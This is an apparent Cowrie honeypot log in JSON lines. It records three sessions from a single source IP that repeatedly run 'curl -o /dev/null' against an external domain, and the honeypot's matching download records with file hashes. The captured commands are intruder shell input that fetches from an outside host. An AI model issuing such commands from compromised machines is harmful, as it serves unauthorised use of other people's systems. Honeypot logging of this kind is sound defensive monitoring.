{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.637985Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.639291Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.639910Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.643150Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.665189Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.665969Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.678062Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.679504Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.680353Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.699467Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.700555Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.701147Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.707002Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.710074Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.712850Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.715343Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.715901Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.717390Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.718256Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.746609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.747739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.748303Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.755220Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.755973Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.757338Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.757832Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.787094Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.788155Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.788722Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.795212Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.795680Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.801823Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.804763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.805647Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.808570Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.835752Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.836897Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.837659Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.839748Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.840549Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.847009Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.851613Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.872940Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.873706Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.878777Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.881282Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.882118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.885716Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.886353Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.891690Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.918433Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.919514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.920205Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.924281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.927557Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.929165Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.929788Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.930929Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.931542Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.963922Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.966389Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.968066Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.968572Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.974031Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.974823Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.976691Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.977265Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.981363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.041253Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.041980Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.045099Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.047638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.048607Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.049365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.051767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.053458Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.053837Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.089985Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.091012Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.094421Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.095438Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:57.096749Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:57.097492Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
